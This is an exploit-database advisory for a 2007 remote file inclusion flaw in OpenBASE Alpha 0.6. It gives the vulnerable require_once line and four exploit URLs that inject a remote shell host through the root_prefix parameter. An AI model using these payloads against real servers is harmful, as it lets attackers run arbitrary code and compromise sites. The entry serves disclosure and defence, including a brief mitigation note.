OpenBASE Alpha 0.6 Remote File Inclusion

vendor:

OpenBASE Alpha

by:

DeltahackingTEAM

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: OpenBASE Alpha

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

OpenBASE Alpha 0.6 Remote File Inclusion

The OpenBASE Alpha 0.6 portal is vulnerable to remote file inclusion. By manipulating the 'root_prefix' parameter in various PHP files, an attacker can execute arbitrary remote files on the server.

Mitigation:

To mitigate this vulnerability, the developer should properly sanitize and validate user input before including files.

Source

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Conatact = Davood_cracker@Yahoo.com
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************

# milw0rm.com [2007-05-25]